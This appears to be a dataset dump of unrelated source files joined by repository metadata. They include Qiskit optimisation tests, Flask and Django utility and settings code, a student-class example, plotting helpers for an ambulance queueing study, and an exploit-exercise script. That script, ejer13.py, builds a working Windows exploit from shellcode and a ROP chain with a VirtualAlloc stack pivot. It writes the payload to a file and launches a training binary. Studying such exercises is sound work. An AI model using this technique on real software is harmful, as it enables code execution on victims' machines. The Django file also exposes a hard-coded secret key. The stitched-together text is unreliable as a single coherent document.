["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["u1", "rx"],
["rz", "sx"],
["p", "sx"],
)
def test_parameterized_circuits(self, basis):
"""Parameters should be treated as opaque gates."""
qr = QuantumRegister(1)
qc = QuantumCircuit(qr)
theta = Parameter("theta")
qc.p(0.3, qr)
qc.p(0.4, qr)
qc.p(theta, qr)
qc.p(0.1, qr)
qc.p(0.2, qr)
qc.p(theta, qr)
qc.p(0.3, qr)
qc.p(0.2, qr)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
self.assertTrue(
Operator(qc.bind_parameters({theta: 3.14})).equiv(
Operator(result.bind_parameters({theta: 3.14}))
)
)
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["u1", "rx"],
["rz", "sx"],
["p", "sx"],
)
def test_parameterized_expressions_in_circuits(self, basis):
"""Expressions of Parameters should be treated as opaque gates."""
qr = QuantumRegister(1)
qc = QuantumCircuit(qr)
theta = Parameter("theta")
phi = Parameter("phi")
sum_ = theta + phi
product_ = theta * phi
qc.p(0.3, qr)
qc.p(0.4, qr)
qc.p(theta, qr)
qc.p(phi, qr)
qc.p(sum_, qr)
qc.p(product_, qr)
qc.p(0.3, qr)
qc.p(0.2, qr)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
self.assertTrue(
Operator(qc.bind_parameters({theta: 3.14, phi: 10})).equiv(
Operator(result.bind_parameters({theta: 3.14, phi: 10}))
)
)
def test_identity_xyx(self):
"""Test lone identity gates in rx ry basis are removed."""
circuit = QuantumCircuit(2)
circuit.rx(0, 1)
circuit.ry(0, 0)
basis = ["rxx", "rx", "ry"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_zxz(self):
"""Test lone identity gates in rx rz basis are removed."""
circuit = QuantumCircuit(2)
circuit.rx(0, 1)
circuit.rz(0, 0)
basis = ["cz", "rx", "rz"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_psx(self):
"""Test lone identity gates in p sx basis are removed."""
circuit = QuantumCircuit(1)
circuit.p(0, 0)
basis = ["cx", "p", "sx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_u(self):
"""Test lone identity gates in u basis are removed."""
circuit = QuantumCircuit(1)
circuit.u(0, 0, 0, 0)
basis = ["cx", "u"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_u3(self):
"""Test lone identity gates in u3 basis are removed."""
circuit = QuantumCircuit(1)
circuit.append(U3Gate(0, 0, 0), [0])
basis = ["cx", "u3"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_r(self):
"""Test lone identity gates in r basis are removed."""
circuit = QuantumCircuit(1)
circuit.r(0, 0, 0)
basis = ["r"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_u1x(self):
"""Test lone identity gates in u1 rx basis are removed."""
circuit = QuantumCircuit(2)
circuit.u1(0, 0)
circuit.rx(0, 1)
basis = ["cx", "u1", "rx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_overcomplete_basis(self):
"""Test optimization with an overcomplete basis."""
circuit = random_circuit(3, 3, seed=42)
basis = ["rz", "rxx", "rx", "ry", "p", "sx", "u", "cx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
basis_translated = passmanager.run(circuit)
passmanager = PassManager()
passmanager.append(Optimize1qGatesDecomposition(basis))
result_full = passmanager.run(basis_translated)
self.assertTrue(Operator(circuit).equiv(Operator(result_full)))
self.assertGreater(basis_translated.depth(), result_full.depth())
def test_euler_decomposition_worse(self):
"""Ensure we don't decompose to a deeper circuit."""
circuit = QuantumCircuit(1)
circuit.rx(-np.pi / 2, 0)
circuit.rz(-np.pi / 2, 0)
basis = ["rx", "rz"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
# decomposition of circuit will result in 3 gates instead of 2
# assert optimization pass doesn't use it.
self.assertEqual(circuit, result, f"Circuit:\n{circuit}\nResult:\n{result}")
def test_euler_decomposition_worse_2(self):
"""Ensure we don't decompose to a deeper circuit in an edge case."""
circuit = QuantumCircuit(1)
circuit.rz(0.13, 0)
circuit.ry(-0.14, 0)
basis = ["ry", "rz"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual(circuit, result, f"Circuit:\n{circuit}\nResult:\n{result}")
def test_euler_decomposition_zsx(self):
"""Ensure we don't decompose to a deeper circuit in the ZSX basis."""
circuit = QuantumCircuit(1)
circuit.rz(0.3, 0)
circuit.sx(0)
circuit.rz(0.2, 0)
circuit.sx(0)
basis = ["sx", "rz"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual(circuit, result, f"Circuit:\n{circuit}\nResult:\n{result}")
def test_euler_decomposition_zsx_2(self):
"""Ensure we don't decompose to a deeper circuit in the ZSX basis."""
circuit = QuantumCircuit(1)
circuit.sx(0)
circuit.rz(0.2, 0)
circuit.sx(0)
circuit.rz(0.3, 0)
basis = ["sx", "rz"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual(circuit, result, f"Circuit:\n{circuit}\nResult:\n{result}")
def test_optimize_u_to_phase_gate(self):
"""U(0, 0, pi/4) -> p(pi/4). Basis [p, sx]."""
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.append(UGate(0, 0, np.pi / 4), [qr[0]])
expected = QuantumCircuit(qr)
expected.append(PhaseGate(np.pi / 4), [qr[0]])
basis = ["p", "sx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_optimize_u_to_p_sx_p(self):
"""U(pi/2, 0, pi/4) -> p(-pi/4)-sx-p(p/2). Basis [p, sx]."""
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.append(UGate(np.pi / 2, 0, np.pi / 4), [qr[0]])
expected = QuantumCircuit(qr, global_phase=-np.pi / 4)
expected.append(PhaseGate(-np.pi / 4), [qr[0]])
expected.append(SXGate(), [qr[0]])
expected.append(PhaseGate(np.pi / 2), [qr[0]])
basis = ["p", "sx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_optimize_u3_to_u1(self):
"""U3(0, 0, pi/4) -> U1(pi/4). Basis [u1, u2, u3]."""
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.append(U3Gate(0, 0, np.pi / 4), [qr[0]])
expected = QuantumCircuit(qr)
expected.append(U1Gate(np.pi / 4), [qr[0]])
basis = ["u1", "u2", "u3"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_optimize_u3_to_u2(self):
"""U3(pi/2, 0, pi/4) -> U2(0, pi/4). Basis [u1, u2, u3]."""
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.append(U3Gate(np.pi / 2, 0, np.pi / 4), [qr[0]])
expected = QuantumCircuit(qr)
expected.append(U2Gate(0, np.pi / 4), [qr[0]])
basis = ["u1", "u2", "u3"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual(expected, result)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_y_simplification_rz_sx_x(self):
"""Test that a y gate gets decomposed to x-zx with ibmq basis."""
qc = QuantumCircuit(1)
qc.y(0)
basis = ["id", "rz", "sx", "x", "cx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
expected = QuantumCircuit(1)
expected.rz(-np.pi, 0)
expected.x(0)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_short_string(self):
"""Test that a shorter-than-universal string is still rewritten."""
qc = QuantumCircuit(1)
qc.h(0)
qc.ry(np.pi / 2, 0)
basis = ["sx", "rz"]
passmanager = PassManager()
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
expected = QuantumCircuit(1)
expected.sx(0)
expected.sx(0)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_u_rewrites_to_rz(self):
"""Test that a phase-like U-gate gets rewritten into an RZ gate."""
qc = QuantumCircuit(1)
qc.u(0, 0, np.pi / 6, 0)
basis = ["sx", "rz"]
passmanager = PassManager()
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
expected = QuantumCircuit(1, global_phase=np.pi / 12)
expected.rz(np.pi / 6, 0)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_u_rewrites_to_phase(self):
"""Test that a phase-like U-gate gets rewritten into an RZ gate."""
qc = QuantumCircuit(1)
qc.u(0, 0, np.pi / 6, 0)
basis = ["sx", "p"]
passmanager = PassManager()
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
expected = QuantumCircuit(1)
expected.p(np.pi / 6, 0)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
b74fd5349fcc910ed9dcad8717e15620b73eb4be
|
c516df2118000e3abaa61527de7badb94680081e
|
/utilities/common.py
|
b3a2eae746c77898ae21aed1623a0194a141bbd9
|
[
"MIT"
] |
permissive
|
xod442/paw
|
82c8d54af052edaea05ed36a0846fe9722f047f3
|
f55df04dd7af7a1b25844c809187a99cfb24b813
|
refs/heads/main
| 2023-04-16T12:19:50.849945
| 2021-04-26T20:06:51
| 2021-04-26T20:06:51
| 360,992,530
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,345
|
py
|
import time
import boto3
from flask import current_app
import datetime
import arrow
import bleach
def utc_now_ts():
return int(time.time())
def utc_now_ts_ms():
return lambda: int(round(time.time() * 1000))
def ms_stamp_humanize(ts):
ts = datetime.datetime.fromtimestamp(ts/1000.0)
return arrow.get(ts).humanize()
def linkify(text):
text = bleach.clean(text, tags=[], attributes={}, styles=[], strip=True)
return bleach.linkify(text)
def email(to_email, subject, body_html, body_text):
# don't run this if we're running a test or setting is False
if current_app.config.get('TESTING') or not current_app.config.get('AWS_SEND_MAIL'):
return False
client = boto3.client('ses')
return client.send_email(
Source='webmaster@rickkauffman.com',
Destination={
'ToAddresses': [
to_email,
]
},
Message={
'Subject': {
'Data': subject,
'Charset': 'UTF-8'
},
'Body': {
'Text': {
'Data': body_text,
'Charset': 'UTF-8'
},
'Html': {
'Data': body_html,
'Charset': 'UTF-8'
},
}
}
)
|
[
"rick@rickkauffman.com"
] |
rick@rickkauffman.com
|
7b6b378236a2bc362d4690f63b090adb2c04b502
|
ee2bf52e37e23ea3030da212beb484319a35ed80
|
/2015-2016 Nivel Basico/13_ejercicio13/ejer13.py
|
0b89a0858602cd945032f63ee17fb4405c586e74
|
[] |
no_license
|
Trietptm-on-Coding-Algorithms/CLS-Exploits
|
318fde8c3817fc6cf7e81ddf392f5eeac1f5c898
|
94ea56cf51fcd89330c0d93e62d5f3d905e5e602
|
refs/heads/master
| 2020-03-20T19:15:58.696676
| 2016-08-28T11:02:32
| 2016-08-28T11:02:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,286
|
py
|
import struct,subprocess, win32api
p = lambda x : struct.pack("<I", x)
shellcode = "\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52"
shellcode += "\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E"
shellcode += "\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C"
shellcode += "\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F"
shellcode += "\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\x90"
''' shellcode
.code
start:
and sp,0xfffc
xor edx,edx
push edx
push 0x636c6163
mov esi,esp
push edx
push esi
mov esi,DWORD PTR fs:[edx+0x30]
mov esi,DWORD PTR [esi+0xc]
mov esi,DWORD PTR [esi+0xc]
lods eax,DWORD PTR ds:[esi]
mov esi,DWORD PTR [eax]
mov edi,DWORD PTR [esi+0x18]
mov ebx,DWORD PTR [edi+0x3c]
mov ebx,DWORD PTR [edi+ebx*1+0x78]
mov esi,DWORD PTR [edi+ebx*1+0x20]
add esi,edi
mov ecx,DWORD PTR [edi+ebx*1+0x24]
add ecx,edi
iter:
inc edx
lods eax,DWORD PTR ds:[esi]
cmp DWORD PTR [edi+eax*1],0x456e6957
jne iter
movzx edx,WORD PTR [ecx+edx*2-0x2]
mov esi,DWORD PTR [edi+ebx*1+0x1c]
add esi,edi
add edi,DWORD PTR [esi+edx*4]
call edi
nop
'''
payload = "\xff" + p(0x45464748) + p(0xdeadbeef) + p(0xff) # bypassing checks
payload += p(0x1010179b) # pop esi <---------------------=
payload += p(0x10103000+0x74) # virtualloc + 74h |
payload += p(0x10101b00) # jump [esi + 74h] |
payload += p(0x1010103a) # | ret |
payload += p(0x0012af80) # | addr |
payload += p(0x00001000) # | size |
payload += p(0x00001000) # | allocation type |
payload += p(0x00000040) # |- Protection |
payload += p(0x0012af8a) # jmp to nop sled ----------------------= |
payload += p(0x10103000) # virtualAlloc to be poped in shellcode | |
payload += p(0xdeadbeef) * 10 # nop sled <------------------------------= |
payload += p(0x10101CA3) # pop pop pop ret |
payload += p(0x10101039) # stack pivot pop ret -----------------------=
payload += p(0x90909090) * 7
payload += shellcode
fDat = open('fichero.dat', 'wb')
fDat.write(payload)
fDat.close()  # flush the payload to disk before the target program reads it
subprocess.Popen(['ejercicio13.exe'])
|
[
"kalianon2816@gmail.com"
] |
kalianon2816@gmail.com
|
0d45e78b19f4d813d68e96f4df32cedd410ce71d
|
8a80bb000cda51cc3e6d2057455dd36e665ee236
|
/django_server/scale/settings.py
|
2ccccd04c674f8bf73a55d0d82092bfd3eda50ef
|
[] |
no_license
|
johncohn/SmartAmericaServer
|
16dbef7d8643294abbb8c5314f71c351adfb65b1
|
98f0d719340fd8e33ff55166d227da280f4efd3b
|
refs/heads/master
| 2021-01-21T17:53:52.419511
| 2014-05-15T01:21:58
| 2014-05-15T01:21:58
| 19,803,308
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,268
|
py
|
import os, yaml
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Kyle Benson', 'kyle.edward.benson@gmail.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'test_db', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': 'vagrant',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# extract necessary information from environment to run our services on BlueMix
env = os.environ
try:
for k,v in yaml.load(env['VCAP_SERVICES']).items():
if k.startswith('postgresql'):
creds = v[0]['credentials']
DATABASES['default']['HOST'] = creds['host']
DATABASES['default']['PORT'] = creds['port']
DATABASES['default']['USER'] = creds['user']
DATABASES['default']['PASSWORD'] = creds['password']
DATABASES['default']['NAME'] = creds['name']
if k.startswith('user-provided'):
for info in v:
if info['name'] == 'Twilio':
TWILIO_ACCOUNT_SID = info['credentials']['accountSID']
TWILIO_AUTH_TOKEN = info['credentials']['authToken']
except KeyError: #not on BlueMix
pass
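# For reference (added): on Cloud Foundry/BlueMix the VCAP_SERVICES variable is a JSON
# document roughly of the form
#   {"postgresql-x.y": [{"name": "...", "credentials": {"host": "...", "port": "...",
#                                                       "user": "...", "password": "...",
#                                                       "name": "..."}}],
#    "user-provided": [{"name": "Twilio", "credentials": {"accountSID": "...",
#                                                         "authToken": "..."}}]}
# which is the shape the parsing loop above relies on.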
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Los_Angeles'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = '/var/www/app/static/'
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'vw7__ve*_3j^edw+@9k9(24_efqjnul-k=84yis*ew$xstr&*!'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'scale.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'scale.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
'django_twilio',
'django_extensions',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
[
"kyle.edward.benson@gmail.com"
] |
kyle.edward.benson@gmail.com
|
60e077f3f23f697b0b33bdeca4b24594f3478247
|
626b14ce13986b6d5e03143e151004247659625a
|
/Day01-15/code/Day08/student.py
|
7d753978b63ee1f015b2f6a12f70198e93ff89bc
|
[] |
no_license
|
Focavn/Python-100-Days
|
c7586ecf7ae3f1fd42f024558bb998be23ee9df8
|
d8de6307aeff9fe31fd752bd7725b9cc3fbc084b
|
refs/heads/master
| 2021-08-08T17:57:02.025178
| 2020-09-17T11:58:04
| 2020-09-17T11:58:04
| 220,427,144
| 0
| 0
| null | 2019-11-08T08:59:43
| 2019-11-08T08:59:41
| null |
UTF-8
|
Python
| false
| false
| 1,108
|
py
|
"""
Define and use a student class
Version: 0.1
Author: 骆昊
Date: 2018-03-08
"""
def _foo():
print('test')
class Student(object):
# __init__ is a special method used to initialize an object when it is created.
# Through this method we bind the name and age attributes to the student object.
def __init__(self, name, age):
self.name = name
self.age = age
def study(self, course_name):
print('%s正在学习%s.' % (self.name, course_name))
# PEP 8 requires identifier names to be all lowercase, with words joined by underscores,
# but many programmers and companies prefer camelCase naming instead.
def watch_av(self):
if self.age < 18:
print('%s只能观看《熊出没》.' % self.name)
else:
print('%s正在观看岛国大电影.' % self.name)
def main():
stu1 = Student('骆昊', 38)
stu1.study('Python程序设计')
stu1.watch_av()
stu2 = Student('王大锤', 15)
stu2.study('思想品德')
stu2.watch_av()
if __name__ == '__main__':
main()
|
[
"Focavn@users.github.com"
] |
Focavn@users.github.com
|
431602925b46ace497c918040418d87142253df9
|
f87dab371a20e6144935e549b7e87aed36623e9c
|
/data/reinforcement_learning/utility_function_7_with_state_probs/base_scripts/plotting_functions.py
|
985cbfe884ec2f87f232556b81482a39af860176
|
[
"MIT"
] |
permissive
|
MichalisPanayides/AmbulanceDecisionGame
|
7d6aa1a61932671c288550335c192e40fcf7da9f
|
1fbf7a8321395e2908fa6b1f537b3d1e5f1bb979
|
refs/heads/master
| 2023-04-17T19:14:53.229221
| 2022-12-20T15:43:12
| 2022-12-20T15:43:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,083
|
py
|
"""Plotting functions"""
import csv
import itertools
import numpy as np
import matplotlib.pyplot as plt
import ambulance_game as abg
def team_expertise_priority(srv, ind): # pylint: disable=unused-argument
"""
Servers priority based on expertise
"""
if srv.id_number == 1:
return 0
if srv.id_number == 4:
return 1
return np.random.random()
def get_filepath(parameters, e_parameter):
"""
Get the filepath for the output file.
"""
key_params = [
"lambda_1",
"lambda_2",
"num_of_servers",
"threshold",
"system_capacity",
"buffer_capacity",
]
filename_parameters = {key: parameters[key] for key in key_params}
filepath = (
"base_scripts/results/e="
+ str(e_parameter)
+ ","
+ str(filename_parameters)
.replace(" ", "")
.replace("'", "")
.replace(":", "=")
.replace("{", "")
.replace("}", "")
+ ",mu="
+ str(parameters["mu"])
)
return filepath
def read_utilities_from_file(filename):
"""
Read the utilities from the file.
"""
my_list = []
with open(filename, "r", encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
my_list.append([float(i[1:-1]) for i in row])
return my_list
def read_rates_from_file(filename):
"""
Read the rates from the file. Note that this function is specific to 4 servers
"""
server_1_rates = []
server_2_rates = []
server_3_rates = []
server_4_rates = []
with open(filename, "r", encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
num_of_states = len(row) / 4
if int(num_of_states) == num_of_states:
num_of_states = int(num_of_states)
else:
raise Exception("Number of states is not an integer")
server_1_rates.append(
[
float(i.replace("[", "").replace("]", ""))
for i in row[:num_of_states]
]
)
server_2_rates.append(
[
float(i.replace("[", "").replace("]", ""))
for i in row[num_of_states : (2 * num_of_states)]
]
)
server_3_rates.append(
[
float(i.replace("[", "").replace("]", ""))
for i in row[(2 * num_of_states) : (3 * num_of_states)]
]
)
server_4_rates.append(
[
float(i.replace("[", "").replace("]", ""))
for i in row[(3 * num_of_states) :]
]
)
return server_1_rates, server_2_rates, server_3_rates, server_4_rates
def read_states_from_file(filename):
"""
Read the states from the file
"""
state_probs = []
with open(filename, "r", encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
state_probs.append(
[float(i.replace("[", "").replace("]", "")) for i in row]
)
return state_probs
def reconstruct_rates(rates_from_file, system_capacity, buffer_capacity, threshold):
"""
Reconstruct rates dictionary where it will be of the form:
rates = dict{
iteration : dict{
server_id: dict{
state: rate
}
}
}
I changed main.py after the first two experiments and the results are now
    saved in two different ways. That's why I needed to use the two if
statements. The two if statements are:
- If num_of_states == len(all_states) means that there is one entry for
every valid rate for each server
- Elif num_of_states == (system_capacity + 1) * (buffer_capacity + 1) means
that there is one entry for all possible combinations of (u,v)
where some are not valid
e.g. T=3, N=4, M=2 => state (1,1) does not exist in the first case
while it is on the second (stupid Mike)
"""
num_of_servers = len(rates_from_file)
num_of_iterations = len(rates_from_file[0])
num_of_states = len(rates_from_file[0][0])
all_states = abg.markov.build_states(
threshold=threshold,
system_capacity=system_capacity,
buffer_capacity=buffer_capacity,
)
if num_of_states == len(all_states):
rates = {}
for iteration in range(num_of_iterations):
rates[iteration] = {}
for server_id in range(1, num_of_servers + 1):
rates[iteration][server_id] = {}
for index, (u, v) in enumerate(sorted(all_states)):
# if v >= threshold or u == 0:
rates[iteration][server_id][(u, v)] = rates_from_file[
server_id - 1
][iteration][index]
elif num_of_states == (system_capacity + 1) * (buffer_capacity + 1):
rates = {}
for iteration in range(num_of_iterations):
rates[iteration] = {}
for server_id in range(1, num_of_servers + 1):
rates[iteration][server_id] = {}
for index, (u, v) in enumerate(
itertools.product(
range(buffer_capacity + 1), range(system_capacity + 1)
)
):
if v >= threshold or u == 0:
rates[iteration][server_id][(u, v)] = rates_from_file[
server_id - 1
][iteration][index]
else:
raise Exception("Dunno what you on about mate")
return rates
def reconstruct_rates_matrix_from_dictionary(
rates_dict, system_capacity, buffer_capacity
):
"""
Reconstruct rates matrix from dictionary.
"""
rates_array = np.empty((buffer_capacity + 1, system_capacity + 1)) * np.nan
for (u, v), rate in rates_dict.items():
rates_array[(u, v)] = rate
return rates_array
def reconstruct_state_probabilities(states_from_file, system_capacity, buffer_capacity):
"""
Reconstruct state probabilities dictionary where it will be of the form:
state_probs = dict{
iteration : dict{
state: probability
}
}
}
"""
num_of_iterations = len(states_from_file)
num_of_states = len(states_from_file[0])
if num_of_states == (system_capacity + 1) * (buffer_capacity + 1):
state_probs = {}
for iteration in range(num_of_iterations):
state_probs[iteration] = (
np.zeros((buffer_capacity + 1, system_capacity + 1)) * np.NaN
)
for index, (u, v) in enumerate(
itertools.product(
range(buffer_capacity + 1), range(system_capacity + 1)
)
):
current_state_prob = states_from_file[iteration][index]
if not np.isnan(current_state_prob):
state_probs[iteration][u, v] = current_state_prob
else:
raise Exception("Invalid number of states")
return state_probs
def get_plots(utilities, all_rates, all_state_probs, num_of_servers):
"""
    Plot the utilities and the weighted mean rates of all servers over all
iterations.
Weighted rate = Rate at state (u,v) * Probability of state (u,v)
"""
_, (ax1, ax2) = plt.subplots(1, 2, figsize=(20, 7))
for srv in range(num_of_servers):
ax1.plot([util[srv] for util in utilities])
for srv in range(1, num_of_servers + 1):
server_mean_weighted_rates = []
for itr, _ in enumerate(all_rates):
current_iteration_mean_weighted_rate = 0
for state, current_rate in all_rates[itr][srv].items():
current_state_prob = all_state_probs[itr][state]
if not np.isnan(current_state_prob) and state != (0, 0):
current_iteration_mean_weighted_rate += (
current_rate * current_state_prob
)
server_mean_weighted_rates.append(current_iteration_mean_weighted_rate)
ax2.plot(server_mean_weighted_rates)
ax1.legend([f"Server {srv}" for srv in range(1, num_of_servers + 1)])
ax1.set_title("Utilities of all servers over all iterations")
ax2.legend([f"Server {srv}" for srv in range(1, num_of_servers + 1)])
ax2.set_title("Weighted mean rates of all servers over all iterations")
def get_utilities_rates_and_state_probs(
filepath, threshold, system_capacity, buffer_capacity
):
"""
Construct the utilities, rates and state probabilities from file.
"""
